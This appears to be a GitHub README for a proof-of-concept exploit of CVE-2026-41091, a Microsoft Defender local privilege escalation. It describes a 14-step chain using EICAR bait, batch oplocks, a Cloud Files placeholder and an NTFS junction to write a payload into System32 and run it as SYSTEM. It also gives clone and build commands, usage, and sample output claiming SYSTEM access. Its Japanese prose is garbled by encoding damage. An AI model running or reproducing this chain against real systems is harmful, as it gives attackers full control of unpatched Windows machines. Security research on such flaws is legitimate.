
CVE-2026-41091-PoC-Exploit Full-PoCv2
CVE-2026-41091 RedSun | Microsoft Defender LPE ใจใฏในใใญใคใใไฝ็นๆจฉใฆใผใถใผใ Cloud Files API + NTFS ใธใฃใณใฏใทใงใณใฎใใชใใฏใซใใ NT AUTHORITY\SYSTEM ๐ฅ ใๅๅพใDefender ใซ SYSTEM ๆจฉ้ใงๆชๆใฎใใใใคใญใผใใ System32 ใซๆธใ่พผใพใใใโ ๏ธ ๅฎ้ใซๆดป็บใซๆช็จใใใฆใใพใใCVSS 7.8ใใใใ: Defender Engine 1.1.26040.8ใ๐ก๏ธ ๆ่ฒ็ฎ็ใฎ PoC ใฎใฟใ

โ๏ธ CVE-2026-41091 - RedSun (SolarFlare) - Microsoft Defender LPE ใจใฏในใใญใคใ
Microsoft Defender ใชใณใฏใใฉใญใผใคใณใฐ่ๅผฑๆง - NT AUTHORITY\SYSTEM ใธใฎใญใผใซใซ็นๆจฉๆๆ ผ
ใใฎ่ๅผฑๆงใฏ "RedSun" ๐ฏ ใจใใฆ็ฅใใใฆใใใ"SolarFlare" ใฏ็งใใจใฏในใใญใคใใซไปใใๅๅใงใใ โ
๐ ๆฆ่ฆ
ใใฎใชใใธใใชใซใฏใMicrosoft Defender (Microsoft Malware Protection Engine) ใซใใใ้ๅคงใชใญใผใซใซ็นๆจฉๆๆ ผ่ๅผฑๆง CVE-2026-41091 ใฎๅฎๅ จๅไฝใใ Proof of Concept (PoC) ใจใฏในใใญใคใใๅซใพใใฆใใพใใไธ้ฉๅใชใชใณใฏ่งฃๆฑบ (CWE-59) ใๆช็จใใใใจใงใ่ช่จผใใใไฝๆจฉ้ใฎๆปๆ่ ใฏ NT AUTHORITY\SYSTEM ๆจฉ้ใๅๅพใงใใพใใ
ใใฎ่ๅผฑๆงใฏ "RedSun" ใพใใฏ "SolarFlare" ใจใใฆใ็ฅใใใCloud Files API (CfAPI) ใจ NTFS ใธใฃใณใฏใทใงใณใใคใณใใไฝฟ็จใใฆใๆปๆ่ ใ Microsoft Defender ใ้จใใSYSTEM ๆจฉ้ใงไฟ่ญทใใใใทในใใ ใฎๅ ดๆใซไปปๆใฎใใกใคใซใๆธใ่พผใใใจใๅฏ่ฝใซใใพใใ
ๆณจ: ใใฎใชใใธใใชใซใฏ 2 ใคใฎใใผใธใงใณใๅซใพใใฆใใพใ:
basic_poc.cpp- ็ฐก็ฅๅใใใใขใซใดใชใบใ ใฎใใข (ๆ่ฒ็จ)full_poc.cpp- ใในใฆใฎๆฉ่ฝใๅใใๅฎๅ จใชใจใฏในใใญใคใ
๐ฅ ไธปใชๆฉ่ฝ
| ใซใใดใช | ๆฉ่ฝ |
|---|---|
| ๆช็จ | โ
SYSTEM ใธใฎใญใผใซใซ็นๆจฉๆๆ ผ โ Cloud Files API (CfAPI) ็ตฑๅ โ ใฏใฉใฆใใใฌใผในใใซใใผใฎไฝๆ โ NTFS ใธใฃใณใฏใทใงใณใชใใคใฌใฏใ |
| ใใฏใใใฏ | โ
ใใใ Oplock ๆช็จ โ VSS ในใใใใทใงใใๆคๅบ โ EICAR ใใชใฌใผ โ COM ใตใผใในใขใฏใใฃใใผใทใงใณ |
| ใฟใผใฒใใ | โ
Microsoft Defender < 1.1.26040.8 โ Windows 10/11 โ Windows Server 2019/2022 |
| ใฆใผใถใใชใใฃ | โ
่ฉณ็ดฐใชใญใฐ่จ้ฒ โ ใจใฉใผใใณใใชใณใฐ โ ใฉใณใใ ใชใใฃใฌใฏใใชๅ โ ่ชๅใฏใชใผใณใขใใ |
๐ฏ ่ๅผฑๆงใฎ่ฉณ็ดฐ
| ๅฑๆง | ๅค |
|---|---|
| CVE ID | CVE-2026-41091 |
| CVSS ในใณใข | 7.8 (้ซ) |
| CVSS Vector | AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H |
| ๆปๆใใฏใใซ | ใญใผใซใซ |
| ๅฟ ่ฆใชๆจฉ้ | ไฝ |
| ใฆใผใถใผๅฏพ่ฉฑ | ใชใ |
| ๅฝฑ้ฟ | SYSTEM ใฌใใซใฎใณใผใๅฎ่ก |
| CISA KEV | โ ใฏใ (ๅฎ้ใซๆช็จไธญ) |
| ๅฉ็จๅฏ่ฝใชใใใ | Microsoft Malware Protection Engine 1.1.26040.8 |
๐ฆ ๅฝฑ้ฟใๅใใ่ฃฝๅ
| ่ฃฝๅ | ๅฝฑ้ฟใๅใใใใผใธใงใณ | ไฟฎๆญฃใใผใธใงใณ |
|---|---|---|
| Microsoft Malware Protection Engine | < 1.1.26040.8 | 1.1.26040.8+ |
| Microsoft Defender Antimalware Platform | < 4.18.26040.7 | 4.18.26040.7+ |
๐ฌ ใจใฏในใใญใคใใใงใผใณ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
โ SOLARFLARE EXPLOIT CHAIN โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโค
โ โ
โ 1. Create Working Directory โ
โ โโ> %TEMP%\SF-XXXX\ โ
โ โ
โ 2. Trigger Defender with EICAR โ
โ โโ> Write reversed EICAR to bait file โ
โ โ
โ 3. Wait for VSS Snapshot โ
โ โโ> Detect Volume Shadow Copy creation โ
โ โ
โ 4. Create First Batch Oplock โ
โ โโ> FSCTL_REQUEST_BATCH_OPLOCK on bait file โ
โ โ
โ 5. Wait for Oplock Break โ
โ โโ> Acquire exclusive access โ
โ โ
โ 6. Rename Directory โ
โ โโ> Move original directory to .tmp โ
โ โ
โ 7. Register Cloud Sync Root โ
โ โโ> CfRegisterSyncRoot with Cloud Files API โ
โ โ
โ 8. Create Cloud Placeholder โ
โ โโ> CfCreatePlaceholders for bait file โ
โ โ
โ 9. Create Second Batch Oplock โ
โ โโ> FSCTL_REQUEST_BATCH_OPLOCK on cloud placeholder โ
โ โ
โ 10. Wait for Second Oplock Break โ
โ โโ> Acquire exclusive access โ
โ โ
โ 11. Rename Cloud Directory โ
โ โโ> Move cloud directory to .cloud.tmp โ
โ โ
โ 12. Create NTFS Junction to System32 โ
โ โโ> Redirect to C:\Windows\System32 โ
โ โ
โ 13. Copy Payload to System32 โ
โ โโ> Copy bait file to System32 as TieringEngineService.exe โ
โ โ
โ 14. Activate Service as SYSTEM โ
โ โโ> CoCreateInstance(StorageTiersManagement) โ
โ โ
โโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโโ
๐ฆ ใคใณในใใผใซ
ๅๆๆกไปถ
- Windows 10/11 ใพใใฏ Windows Server 2019/2022
- Visual Studio 2019/2022 (C++ ใใผใซไปใ)
- ็ฎก็่ ๆจฉ้ (ๅฎ่ก็จ)
ใใซใ
# ใชใใธใใชใใฏใญใผใณ
git clone https://github.com/tc4dy/CVE-2026-41091-PoC-Exploit
cd CVE-2026-41091-PoC-Exploit
# Visual Studio Developer Command Prompt ใไฝฟ็จใใฆใใซใ
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# ใพใใฏๅบๆฌใใผใธใงใณใใใซใ
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
๐ ๏ธ ไฝฟ็จๆนๆณ
ๅฎๅ จใจใฏในใใญใคใ (SYSTEM ๆจฉ้ๆๆ ผ)
full_poc.exe
ๅบๆฌใขใซใดใชใบใ ใฎใใข
basic_poc.exe
๐ ๅบๅไพ
ๅฎๅ จใจใฏในใใญใคใๅบๅ
CVE-2026-41091 SolarFlare PoC
===============================
by @tc4dy | CVSS 7.8
===============================
[*] SolarFlare exploit started.
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\SF-8427\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS snapshot detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Renaming cloud directory...
[+] Cloud directory renamed
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\TieringEngineService.exe
[*] Activating Storage Tiers Management service...
[+] Service activated as SYSTEM
[+] SYSTEM access obtained!
ๅบๆฌ PoC ๅบๅ
CVE-2026-41091 Basic PoC
========================================
Algorithm Demonstration Only
========================================
[*] Starting exploit algorithm...
[*] Creating working directory...
[+] Directory created: C:\Users\user\AppData\Local\Temp\BE-3921\
[*] Triggering Defender with EICAR...
[+] Defender triggered
[*] Waiting for VSS snapshot...
[+] VSS detected
[*] Creating first oplock...
[+] First oplock created
[*] Waiting for oplock break...
[+] Oplock acquired
[*] Renaming directory...
[+] Directory renamed
[*] Creating second oplock...
[+] Second oplock created
[*] Waiting for second oplock...
[+] Second oplock acquired
[*] Creating NTFS junction to System32...
[+] Junction created
[*] Waiting for Defender to finish...
[*] Copying payload to System32...
[+] Payload copied to C:\Windows\System32\Payload.exe
[+] Algorithm demonstration completed!
[i] This is only the basic algorithm.
[i] For full SYSTEM privilege escalation,
[i] use full_poc.cpp with Cloud API and COM activation.
๐ง ใใซใๆ้
Visual Studio ใไฝฟ็จ
- Visual Studio 2022 ็จ้็บ่ ใณใใณใใใญใณใใใ้ใ
- ใจใฏในใใญใคใใใฃใฌใฏใใชใซ็งปๅ
- ๅฎ่ก:
# ๅฎๅ
จใจใฏในใใญใคใ
cl.exe /EHsc /std:c++17 full_poc.cpp /link cfapi.lib ntdll.lib
# ๅบๆฌ PoC
cl.exe /EHsc /std:c++17 basic_poc.cpp /link ntdll.lib
CMake ใไฝฟ็จ
cmake_minimum_required(VERSION 3.10)
project(SolarFlare)
set(CMAKE_CXX_STANDARD 17)
add_executable(full_poc full_poc.cpp)
target_link_libraries(full_poc cfapi ntdll)
add_executable(basic_poc basic_poc.cpp)
target_link_libraries(basic_poc ntdll)
โ ๏ธ ่ฆไปถใจๅถ้ไบ้
| ่ฆไปถ | ่ฉณ็ดฐ |
|---|---|
| OS | Windows 10/11, Server 2019/2022 |
| ๆจฉ้ | ็ฎก็่ (ๅฎ่ก็จ) |
| Defender | Microsoft Defender ใๆๅนใงใใๅฟ ่ฆใใใใพใ |
| ใคใณใฟใผใใใ | VSS ในใใใใทใงใใๆคๅบใซๅฟ ่ฆ |
| ใใใ | ใใใๆช้ฉ็จใฎใทในใใ ใงใฎใฟๅไฝ |
| ใขใผใญใใฏใใฃ | x64 ใฎใฟ |
๐ ้ข้ฃใจใฏในใใญใคใ
ไปใฎใจใฏในใใญใคใใชใใธใใชใใ่ฆงใใ ใใ:
- CVE-2026-24061-PoC-Exploit - GNU inetutils-telnetd ่ช่จผใใคใใน
- CVE-2026-41940-PoC-Exploit - cPanel/WHM ่ช่จผใใคใในใจใฏในใใญใคใ
- CVE-2026-0073-PoC-Exploit - Android ADB ใฏใคใคใฌในใใใใฐ่ช่จผใใคใใน